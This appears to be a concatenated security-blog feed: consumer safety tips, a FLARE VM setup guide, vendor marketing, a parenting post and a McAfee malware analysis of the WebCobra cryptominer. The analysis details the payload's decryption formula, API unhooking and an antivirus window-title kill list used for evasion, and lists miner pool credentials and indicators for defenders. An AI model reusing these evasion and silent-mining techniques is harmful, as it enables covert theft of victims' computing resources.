  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.

FLARE VM Update

FLARE VM is the first of its kind reverse engineering and malware analysis distribution on Windows platform. Since its introduction in July 2017, FLARE VM has been continuously trusted and used by many reverse engineers, malware analysts, and security researchers as their go-to environment for analyzing malware. Just like the ever-evolving security industry, FLARE VM has gone through many major changes to better support our users’ needs. FLARE VM now has a new installation, upgrade, and uninstallation process, which is a long anticipated feature requested by our users. FLARE VM also includes many new tools such as IDA 7.0, radare and YARA. Therefore, we would like to share these updates, especially the new installation process.

Installation

We strongly recommend you use FLARE VM within a virtualized environment for malware analysis to protect and isolate your physical device and network from malicious activities. We assume you already have experience setting up and configuring your own virtualized environment. Please create a new virtual machine (VM) and perform a fresh installation of Windows. FLARE VM is designed to be installed on Windows 7 Service Pack 1 or newer; therefore, you can select a version of windows that best suits your needs. From this point forward, all installation steps should be performed within your VM.

Once you have a VM with a fresh installation of Windows, use one of the following URLs to download the compressed FLARE VM repository onto your VM:

  • https://github.com/fireeye/flare-vm
  • https://flarevm.info


Figure 1: Download FLARE VM repo

Then, use the following steps to install FLARE VM:

  1. Decompress the FLARE VM repository to a directory of your choosing.
  2. Start a new session of PowerShell with escalated privileges. FLARE VM attempts to install additional software and modify system settings; therefore, escalated privileges are required for installation.
  3. Within PowerShell, change directory to the location where you have decompressed the FLARE VM repository.
  4. Enable unrestricted execution policy for PowerShell by executing the following command and answering “Y” when prompted by PowerShell: Set-ExecutionPolicy unrestricted
  5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. FLARE VM needs the current user’s password to automatically login after a reboot when installing. Optionally, you can specify the current user’s password by passing the “-password <current_user_password>” at the command line.


Figure 2: Start PowerShell as administrator


Figure 3: Ready to install FLARE VM

The rest of the installation process is fully automated. Depending upon your internet speed the entire installation may take up to one hour to finish. The VM also reboots multiple times due to the numerous software installations’ requirements. Once the installation completes, the PowerShell prompt remains open waiting for you to hit any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 4: FLARE VM installation completes

Congratulations! You have successfully installed FLARE VM. At this point we recommend you power off the VM, switch the VM networking mode to Host-Only, and then take a snapshot to save a clean state of your analysis VM.

Improvement

The biggest improvement for FLARE VM is the ability to perform a proper update and uninstallation. The older version of FLARE VM came as a PowerShell script to install many chocolatey packages, one at a time; therefore, we were unable to include new packages when updating FLARE VM. In the past, our users had to reinstall FLARE VM completely, which is time consuming, or manually install the new package, which is error prone. To solve this issue, we have converted FLARE VM itself into a chocolatey package. Whenever a new tool is available we will also release a new version of FLARE VM. With this new design we can simply execute “choco upgrade all” to get the newest version of FLARE VM along with any new packages we have released. You can also safely uninstall all FLARE VM packages by executing “choco uninstall flarevm.installer.flare”.

Our new FLARE VM is also updated to use Python 3.7 as the default Python interpreter. As a result, many python scripts may fail to execute. To maintain support for older scripts, we keep Python 2.7 installed in parallel with Python 3.7. We can easily switch between different versions by using the Python launcher. Run “py -2.7 <path_to_python_script>” to use Python 2.7, or “py <path_to_python_script>” to use the default Python 3.7 interpreter. For more details on the Python launcher, please refer to the following URL: https://docs.python.org/3/using/windows.html#launcher.

Additionally, the new FLARE VM changes the location where Fakenet-NG saves its output when launched via the shortcut in the FLARE folder or taskbar pin. Instead of saving directly to the desktop, to reduce clutter, Fakenet-NG will store all its output in “Desktop\fakenet_logs”.

Compared to older versions this version of FLARE VM comes with many new tools and software packages. Most notably, this release adds the following:

  • IDA Free 7.0
  • radare2 to support 64-bit disassembly
  • The labs for the Practical Malware Analysis book
  • pdfid, pdf-parser, and PdfStreamdumper to analyze malicious PDF documents
  • The Malcode Analyst Pack
  • Yara for signature matching
  • The Cygwin Linux environment on windows
  • PowerShell transcription and script block logging
    • PowerShell transcripts can be found in “Desktop\PS_Transcripts”

Available Packages

While we attempt to make the tools available as shortcuts within the FLARE folder, there are several available from command-line only. Please see the online documentation for the most up to date list. Here is an incomplete list of some major tools available on FLARE VM:

  • Disassemblers:
    • IDA Free 5.0 and IDA Free 7.0
    • Binary Ninja
    • Radare2 and Cutter
  • Debuggers:
    • OllyDbg and OllyDbg2
    • x64dbg
    • Windbg
  • File Format parser:
    • CFF Explorer, PEView, PEStudio
    • PdfStreamdumper, pdf-parser, pdfid
    • ffdec
    • offvis and officemalscanner
    • PE-bear
  • Decompilers:
    • RetDec
    • Jd-gui and bytecode-viewer
    • dnSpy
    • IDR
    • VBDecompiler
    • Py2ExeDecompiler
  • Monitoring tools:
    • SysInternal suite
    • RegShot
  • Utilities:
    • Hex Editors (010 editor, HxD and File Insight)
    • FLOSS (FireEye Labs Obfuscated String Solver)
    • Fakenet-NG
    • Yara
    • Malware Analyst Pack

Conclusion

The FLARE team continues to support and improve FLARE VM to be the de facto distribution for security research, incident response, and malware analysis on Windows platform. We greatly appreciate the numerous bug reports, tool requests, and feature recommendations from everyone. We hope FLARE VM, along with many other FLARE open source projects, can help you do your work better, easier, and faster.

We are always looking for talented folks to join our team. The FLARE Team may be a good place for you if:

  • You eat, sleep, and speak disassembly and malware all day long.
  • You would like to push the state of the art for reverse engineering and malware analysis.

Please check out our careers page, or send us an email. Happy Reversing!

Why Traditional Database Security Doesn’t Protect Data

If we asked database administrators, security teams, and risk teams about their definition of what database security is, the answers would vary widely.

Each team views the definition based on their own requirements, but the one answer that most likely won’t appear is: “To protect data.”

Traditionally, database security has always been seen as a means to protect the database systems from vulnerabilities, missing patches, simple misconfigurations, or SQL injections. While this certainly holds true in today’s environments too, we cannot ignore the fact that requirements for securing a company’s most valuable asset—its data—have changed.

Adding data to database security

With the increase in regulatory compliance requirements such as PCI-DSS, HIPAA, SOX, and GDPR, enterprises are asking more and more from their data protection solutions. Data is seen as the new oil—a way to fuel companies. Protecting data must be at the core of every strategy. Where better to start than the one place most data resides, the database?

Database security solutions in today’s data- and compliance-driven environments must not only allow companies to measure the level of security of their databases but must provide the ability to locate personal identifiable data, business critical data, and any other data that is of value to the organization.

In addition, any data that is discovered must be monitored, in real time, 24/7. Long gone are the days when audit logs were sufficient or simple network monitoring was considered adequate. Data is the world’s greatest asset and companies must invest in protecting their own data as well as their customers’ data.

As-a-service: a world of shared responsibilities

Database(s)-as-a-service is one of the fastest growing markets within the world of cloud. It provides organizations with unparalleled amounts of scalability and compute power while at the same time removing many of the challenges that we would see as traditionally related to database security (vulnerability and patch management, for example). In the shared responsibility world of the cloud, the one constant is data. Customers are always responsible for protecting and monitoring their data.

Too many data breaches are successful because the exfiltration of data was made possible by either very little or no real-time monitoring of the data. Traditional database security is not designed to protect data, it’s designed to protect the database from malicious SQL injections or vulnerabilities. One might argue that is data protection. But in reality, database security in today’s data-driven environments must allow organizations to monitor anyone and anything that accesses the “crown jewels,” in real time, with the ability to stop unauthorized access to data.

McAfee helps fill that gap by offering software-based database security solutions that allow the monitoring of database instances across both on-premises solutions and the cloud. Non-intrusive, lightweight, and easy to deploy, McAfee database security solutions allow customers to enjoy all the benefits of moving to a hybrid cloud enterprise database environment while retaining control over security, risk, and data protection.

For more information, visit the database security product information page.

The post Why Traditional Database Security Doesn’t Protect Data appeared first on McAfee Blogs.

Be the Child On Children’s Day – Try Out Role Reversal To Build Better Bonds With Your Kids

November 14th is a day children in India keenly look forward to. Schools and neighbourhoods gear up to make the day a memorable one for the children; TV channels run continuous children’s special serials and movies and there is no pressure at home to study.

At the Facebook Safety Summit panel discussion, where I recently participated, a lady from the audience expressed her inability to understand her teen. They seemed to be living in different dimensions! I suggested she work with him to help her become tech-savvy.

One Teacher’s Day program that was a great hit in my school was when teachers pretended to be a students and presented a farce. The children just loved it! Why can’t we do this at home sometimes?

There will always be situations when children would need to be reminded of their boundaries and you need to put on your parent-mantle and say, “Because I said so!” Parents need to be both firm and loving. But what if you are in uncharted territories like the digital world? Where your knowledge of the latest social media developments is limited compared to that of your children? How can you establish yourself as an authority your children will respect, obey and turn to for guidance if you are not a digital literate? Who will you turn to for cyber surfing tips?

Your children.

Yes, you heard that right. Turn the table around and be the student for a change. Let your kids teach you about the digital world. You can encourage them by asking about security, privacy, cyberbullying, fake news, risky games and other topics that concern you. Check out how they download apps. Be prepared for some amazing conversations and insights into their digital hygiene awareness. You will know whether they are mature enough to handle tricky situations. If you buy a new device, consult them on securing it and activating 2-factor authentication.

Benefits of digital role reversals

  1. Set an example: Children learn a lot by observing their parents. So, if you don’t hesitate to ask them when in doubt, they wouldn’t either. Also, if parents practice digital balance, kids will usually follow suit.
  2. Promote mutual understanding, trust and respect: Commend your kids when they share valuable tips. Your words would act like an instant confidence booster and make them feel all grown-up and responsible.
  3. Extend real life education to cover the digital one: You can establish this during your conversations about how you think real world lifeskill lessons apply to the virtual space. Talk about peer pressure, good manners, diplomacy, etiquette, etc. to drive home the point.
  4. Better understanding of child’s digital world: Think about all that you can learn! You have first-hand knowledge of the apps they use and can later Google them to learn more about associated risks, if any. You get an idea about what’s trending, the new online threats and also what interests your kids and how they spend time online.
  5. Opportunity to test their cyber security awareness: Dig deep to get to know how kids secure their accounts and the content they create. Also, have a detailed chat about the merits of using licensed security tools vis-à-vis a free basic one. This lesson will last them a lifetime and ensure their online safety so spend time on this on a regular basis.

This Children’s Day, try out a bit of role reversal and pick up tips on being a savvy digital citizen from your kids. Not only will they feel proud of helping you become a smart device user, you also get to understand how they view digital media, online friendship, cyber safety and data privacy. With one stroke, you will both empower your kids and also strengthen your bonds with them. You are without doubt, your children’s best teacher and well-wisher. So, with their interest in heart, be the kid sometime.

Happy Children’s Day to all your precious angels.

The post Be the Child On Children’s Day – Try Out Role Reversal To Build Better Bonds With Your Kids appeared first on McAfee Blogs.

The Top Cyber Security Threats Facing Enterprises in 2019

The top cyber security threats your organization may encounter in 2019  The cyber threat environment is becoming more dangerous every day. A recent survey by the World Economic Forum revealed that cyber-attacks were the number-one concern of executives in Europe and other advanced economies. As we approach the winter holidays and the end of the… Read More

The post The Top Cyber Security Threats Facing Enterprises in 2019 appeared first on .

Eraser – Windows Secure Erase Hard Drive Wiper

Eraser – Windows Secure Erase Hard Drive Wiper

Eraser is a hard drive wiper for Windows which allows you to run a secure erase and completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns.

Eraser is a Windows focused hard drive wiper and is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7,8 ,10 and Windows Server 2012.

Read the rest of Eraser – Windows Secure Erase Hard Drive Wiper now! Only available at Darknet.

DisruptOps: Something You Probably Should Include When Building Your Next Threat Models

Posted under:

Something You Probably Should Include When Building Your Next Threat Models

We are working on our threat modeling here at DisruptOps and I decided to refresh my knowledge of different approaches. One thing that quickly stood out is that nearly none of the threat modeling documentation or tools I’ve seen cover the CI/CD pipeline.

Read the full post at DisruptOps

- Rich (0) Comments Subscribe to our daily email digest

Shop till You’re Hacked? 3 Tips to Stay Secure this Holiday Season

With just days until Black Friday, the unofficial kick off to the holiday shopping season is quickly approaching. In anticipation of the busiest time of year for e-commerce, this year we conducted a survey, Stressed Holiday Online Shopping, to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity. Let’s take a look at what we can learn from our key findings we garnered from surveying 2,472 adults in the U.S. between the ages of 18 and 55, dive into how the results can help consumers avoid the common pitfalls of holiday shopping and cybersecurity, and learn how they can protect both their devices and digital lives this season.

Deals, deals, deals! When it comes to online shopping, consumers care about saving money

The economic burden of the holidays is something consumers know all too well. With an onslaught of holidays and parties in which gifts are expected for family, friends, or co-workers, it’s no wonder that 79 percent of survey respondents said that holiday shopping puts financial stress on them and/or their families. No doubt, from stretching a budget and bargain shopping to attempting to purchase several perfect gifts when sales are fleeting, browsing and purchasing for the holidays can feel overwhelming, which may be why 53 percent of respondents shared that stress can lead them to be careless when online shopping.

More than half of consumers (56 percent) said that they would use a website they were unfamiliar with if it meant they would save money, while 51 percent shared they would purchase an item from an untrusted online retailer to get a good deal. Thirty-one percent would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.

This season, many will make online purchases, many will use their phones to do so, and even more will unknowingly put themselves at risk when it comes to cybersecurity

When a good deal pops up, it’s hard to pass up – whether you’re in a tricky financial situation or not. This especially rings true when it comes to mobile purchases. The convenience of our phones – which are always with us – lends itself to taking advantage of deals and flash sales that pop up to make impulsive purchases. This always-on access also paves the way for the path to purchase to be much faster and to occur more often.

Perhaps the accessibility that mobile provides is why this holiday season, e-commerce industry experts are predicting that for the first time ever, more online purchases will be made with mobile phones than any other device. That’s right; rather than reach for a laptop or tablet or call out to our virtual assistants, 68 percent of e-commerce visits will be made from our smartphones that are always by our side – whether we’re in a secure setting or not. In fact, 22 percent of McAfee survey respondents shared that they would make online purchases over public or unsecured Wi-Fi, which could potentially expose their private information and payment details.

Our survey also found that while only 6 percent of respondents would be willing to risk having their bank account details fall into the wrong hands for a good deal, 39 percent would risk sharing their email address, 25 percent would wager their phone number, and 16 percent would provide their home address. The problem with this mentality is that through common attacks like phishing, it takes only a bit of information to lead a hacker to gain more of your personal information under the right circumstances. These results illustrate that when it comes to shopping online –regardless of device type– consumers are in it for the holiday deals while unknowingly ignoring their cybersecurity in the process.

Consumers use a variety of ways to discern whether a site or content is unsafe, but rarely report phishing

Fortunately, most people aren’t completely throwing caution to the wind in terms of cybersecurity. Our survey found that consumers use a variety of tricks to scrutinize a website or email in order to interpret safety and danger signals. Half of the respondents check the website design to make sure it looks professional, and 49 percent check for spelling and grammar.

However, 14 percent shared they had no idea how to verify a website and wouldn’t know where to start. Similarly, many people are unfamiliar with how to discern a fake mobile app from an official one. Which is troubling, since last year it was reported that one in 25 Black Friday apps were fake, with at least 15 malicious Black Friday apps for each of the top five U.S. e-commerce brands.

Tips to Stay Safe While Online Shopping This Year

Between the impact of stress on online behavior and constantly evolving cyberthreats, it’s clear that there is a need for re-education on how to stay safe online, especially as cybercriminals are becoming smarter and more relentless. This holiday season, before you whip out those credit cards and mobile devices, consider these tips:

  • Always connect with caution. Public Wi-Fi might seem like a good idea, but if you are not careful, you could be unknowingly be exposing personal information or credit card details to cybercriminals who are snooping on the network. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to help keep your connection secure.
  • Think before you click. One of the easiest ways for a cybercriminal to compromise your system is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phony website designed to steal personal information. If the deal seems too good to be true, or the email was not expected it’s always best to check directly with the source.
  • Browse with security protection. Use comprehensive security protection, like McAfee Total Protection, which can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help identify malicious websites.

Starving for more stats? Check out last year’s survey on hackable holiday gifts. Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Shop till You’re Hacked? 3 Tips to Stay Secure this Holiday Season appeared first on McAfee Blogs.

WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency

The authors thank their colleagues Oliver Devane and Deepak Setty for their help with this analysis.

McAfee Labs researchers have discovered new Russian malware, dubbed WebCobra, which harnesses victims’ computing power to mine for cryptocurrencies.

Coin mining malware is difficult to detect. Once a machine is compromised, a malicious app runs silently in the background with just one sign: performance degradation. As the malware increases power consumption, the machine slows down, leaving the owner with a headache and an unwelcome bill, as the energy it takes to mine a single bitcoin can cost from $531 to $26,170, according to a recent report.

The increase in the value of cryptocurrencies has inspired cybercriminals to employ malware that steals machine resources to mine crypto coins without the victims’ consent.

The following chart shows how the prevalence of miner malware follows changes in the price of Monero cryptocurrency.

Figure 1: The price of cryptocurrency Monero peaked at the beginning of 2018. The total samples of coin miner malware continue to grow. Source: https://coinmarketcap.com/currencies/monero/.

McAfee Labs has previously analyzed the cryptocurrency file infector CoinMiner; and the Cyber Threat Alliance, with major assistance from McAfee, has published a report, “The Illicit Cryptocurrency Mining Threat.” Recently we examined the Russian application WebCobra, which silently drops and installs the Cryptonight miner or Claymore’s Zcash miner, depending on the architecture WebCobra finds. McAfee products detect and protect against this threat.

We believe this threat arrives via rogue PUP installers. We have observed it across the globe, with the highest number of infections in Brazil, South Africa, and the United States.

Figure 2: McAfee Labs heat map of WebCobra infections from September 9–13.

This cryptocurrency mining malware is uncommon in that it drops a different miner depending on the configuration of the machine it infects. We will discuss that detail later in this post.

Behavior

The main dropper is a Microsoft installer that checks the running environment. On x86 systems, it injects Cryptonight miner code into a running process and launches a process monitor. On x64 systems, it checks the GPU configuration and downloads and executes Claymore’s Zcash miner from a remote server.

Figure 3: WebCobra’s installation window.

After launching, the malware drops and unzips a password-protected Cabinet archive file with this command:

Figure 4: The command to unzip the dropped file.

The CAB file contains two files:

  • LOC: A DLL file to decrypt data.bin
  • bin: Contains the encrypted malicious payload

The CAB file uses the following script to execute ERDNT.LOC:

Figure 5: The script to load the DLL file, ERDNT.LOC.

ERDNT.LOC decrypt data.bin and passes the execution flow to it with this routine:

  • [PlainText_Byte] = (([EncryptedData_Byte] + 0x2E) ^ 0x2E) + 0x2E

Figure 6: The decryption routine. 

The program checks the running environment to launch the proper miner, shown in the following diagram:

Figure 7: Launching the proper miner depending on a system’s configuration.

Once data.bin is decrypted and executed, it tries a few anti-debugging, anti-emulation, and anti-sandbox techniques as well as checks of other security products running on the system. These steps allow the malware to remain undetected for a long time.

Most security products hook some APIs to monitor the behavior of malware. To avoid being found by this technique, WebCobra loads ntdll.dll and user32.dll as data files in memory and overwrites the first 8 bytes of those functions, which unhooks the APIs.

List of unhooked ntdll.dll APIs

  • LdrLoadDll
  • ZwWriteVirtualMemory
  • ZwResumeThread
  • ZwQueryInformationProcess
  • ZwOpenSemaphore
  • ZwOpenMutant
  • ZwOpenEvent
  • ZwMapViewOfSection
  • ZwCreateUserProcess
  • ZwCreateSemaphore
  • ZwCreateMutant
  • ZwCreateEvent
  • RtlQueryEnvironmentVariable
  • RtlDecompressBuffer

List of unhooked user32.dll APIs

  • SetWindowsHookExW
  • SetWindowsHookExA

Infecting an x86 system

The malware injects malicious code to svchost.exe and uses an infinite loop to check all open windows and to compare each window’s title bar text with these strings. This is another check by WebCobra to determine if it is running in an isolated environment designed for malware analysis.

  • adw
  • emsi
  • avz
  • farbar
  • glax
  • delfix
  • rogue
  • exe
  • asw_av_popup_wndclass
  • snxhk_border_mywnd
  • AvastCefWindow
  • AlertWindow
  • UnHackMe
  • eset
  • hacker
  • AnVir
  • Rogue
  • uVS
  • malware

The open windows will be terminated if any of preceding strings shows in the windows title bar text.

Figure 8: Terminating a process if the windows title bar text contains specific strings.

Once the process monitor executes, it creates an instance of svchost.exe with the miner’s configuration file specified as an argument and injects the Cryptonight miner code.

Figure 9: Creating an instance of svchost.exe and executing the Cryptonight miner.

Finally, the malware resumes the process with the Cryptonight miner running silently and consuming almost all the CPU’s resources.

Figure 10: An x86 machine infected with the Cryptonight miner. 

Infecting an x64 system

The malware terminates the infection if it finds Wireshark running.

Figure 11: Checking for Wireshark.

The malware checks the GPU brand and mode. It runs only if one of the following GPUs is installed:

  • Radeon
  • Nvidia
  • Asus

Figure 12: Checking the GPU mode.

If these checks are successful, the malware creates the following folder with hidden attributes and downloads and executes Claymore’s Zcash miner from a remote server.

  • C:\Users\AppData\Local\WIX Toolset 11.2

Figure 13: Requesting the download of Claymore’s Zcash miner.

Figure 14: Claymore’s miner.

Figure 15: Executing the miner with its configuration file.

Finally, the malware drops a batch file at %temp%\–xxxxx.cMD to delete the main dropper from [WindowsFolder]\{DE03ECBA-2A77-438C-8243-0AF592BDBB20}\*.*.

Figure 16: A batch file deleting the dropper.

The configuration files of the miners follow.

Figure 17: Cryptonight’s configuration file.

This configuration file contains:

  • The mining pool: 5.149.254.170
  • Username: 49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • Password: soft-net

Figure 18: Claymore’s Zcash miner configuration file.

This configuration file contains:

  • The mining pool: eu.zec.slushpool.com
  • Username: pavelcom.nln
  • Password: zzz

Coin mining malware will continue to evolve as cybercriminals take advantage of this relatively easy path to stealing value. Mining coins on other people’s systems requires less investment and risk than ransomware, and does not depend on a percentage of victims agreeing to send money. Until users learn they are supporting criminal miners, the latter have much to gain.

 

MITRE ATT&CK techniques

  • Exfiltration over command and control channel
  • Command-line interface
  • Hooking
  • Data from local system
  • File and directory discovery
  • Query registry
  • System information discovery
  • Process discovery
  • System time discovery
  • Process injection
  • Data encrypted
  • Data obfuscation
  • Multilayer encryption
  • File deletion

Indicators of compromise

IP addresses
  • 5.149.249[.]13:2224
  • 5.149.254[.]170:2223
  • 104.31.92[.]212
Domains
  • emergency.fee.xmrig[.]com
  • miner.fee.xmrig[.]com
  •  saarnio[.]ru
  • eu.zec.slushpool[.]com

McAfee detections

  • CoinMiner Version 2 in DAT Version 8986; Version 3 in DAT Version 3437
  • l Version 2 in DAT Version 9001; Version 3 in DAT Version 3452
  • RDN/Generic PUP.x Version 2 in DAT Version 8996; Version 3 in DAT Version 3447
  • Trojan-FQBZ, Trojan-FQCB, Trojan-FQCR Versions 2 in DAT Version 9011; Versions 3 in DAT Version 3462

Hashes (SHA-256)

  • 5E14478931E31CF804E08A09E8DFFD091DB9ABD684926792DBEBEA9B827C9F37
  • 2ED8448A833D5BBE72E667A4CB311A88F94143AA77C55FBDBD36EE235E2D9423
  • F4ED5C03766905F8206AA3130C0CDEDEC24B36AF47C2CE212036D6F904569350
  • 1BDFF1F068EB619803ECD65C4ACB2C742718B0EE2F462DF795208EA913F3353B
  • D4003E6978BCFEF44FDA3CB13D618EC89BF93DEBB75C0440C3AC4C1ED2472742
  • 06AD9DDC92869E989C1DF8E991B1BD18FB47BCEB8ECC9806756493BA3A1A17D6
  • 615BFE5A8AE7E0862A03D183E661C40A1D3D447EDDABF164FC5E6D4D183796E0
  • F31285AE705FF60007BF48AEFBC7AC75A3EA507C2E76B01BA5F478076FA5D1B3
  • AA0DBF77D5AA985EEA52DDDA522544CA0169DCA4AB8FB5141ED2BDD2A5EC16CE

The post WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency appeared first on McAfee Blogs.

Android Ecosystem Security Transparency Report is a wary first step

Reading through Google’s first quarterly Android Ecosystem Security Transparency Report feels like a mix of missed opportunities and déjà vu all over again.

Much of what is in the new Android ecosystem security report is data that has been part of Google’s annual Android Security Year in Review report, including the rates of potentially harmful applications (PHAs) on devices with and without sideloaded apps — spoiler alert: sideloading is much riskier — and rates of PHAs by geographical region. Surprisingly, the rates in Russia are lower than in the U.S.

The only other data in the Android ecosystem security report shows the percentage of devices with at least one PHA installed based on Android version. This is new data shows that the newer the version of Android, the less likely it is a device will have a PHA installed.

However, this also hints at the data Google didn’t include in the report, like how well specific hardware partners have done in updating devices to those newer versions of Android. Considering that Android 7.x Nougat is the most common version of the OS in the wild at 28.2% and the latest version 9.0 Pie hasn’t even cracked the 0.1% marker to be included in Google’s platform numbers, the smart money says OEM updating stats wouldn’t be too impressive.

There’s also the matter of Android security updates and the data around which hardware partners are best at pushing them out. Dave Kleidermacher, head of Android security and privacy, said at the Google I/O developer conference in May 2018 that the company was tracking which partners were best at pushing security updates and that it was considering adding hardware support details to future Android Ecosystem Security Transparency Reports. More recently, Google added stipulations to its OEM contracts mandating at least four security updates per year on Android devices.

It’s unclear why Google ultimately didn’t include this data in the report on Android ecosystem security, but Google has been hesitant to call out hardware partners for slow updates in the past. In addition to new requirements in Android partner contracts regarding security updates, there have been rules stating hardware partners need to update any device to the latest version of Android released in the first 18 months after a device launch. However, it has always been unclear what the punishment would be for breaking those rules. Presumably, it would be a ban on access to Google Play services, the Play Store and Google Apps, but there have never been reports of those penalties being enforced.

Google has taken steps to make Android updates easier, including Project Treble in Android 8.0 Oreo, which effectively decoupled the Android system from any software differentiation added by a hardware partner. But, since Android 7.x is still the most common version in the wild, it doesn’t appear as though that work has yielded much fruit yet.

Adding OS and security update stats to the Android Ecosystem Security Transparency Report could go a long way towards shaming OEMs into being better and giving consumers more information with which to make purchasing decisions, but time will tell if Google ever goes so far as to name OEMs specifically.

The post Android Ecosystem Security Transparency Report is a wary first step appeared first on Security Bytes.

The state of ICS and IIoT security in 2019

40 percent of industrial sites have at least one direct connection to the public internet
1 industrial iot smart device power plant electrical utility

Image by Getty Images

Air gaps for critical systems remain an effective way to reduce the chance of attack. No connection to the web means threat actors have to be on-site to conduct operations. However, many companies are failing to ensure they are air-gapped. Over a third of industrial sites have at least one route to the internet. Search tools such as Shodan make it easier to find any devices not properly secured, giving attackers easy entry into industrial networks, and one is enough for attackers to get in.

To read this article in full, please click here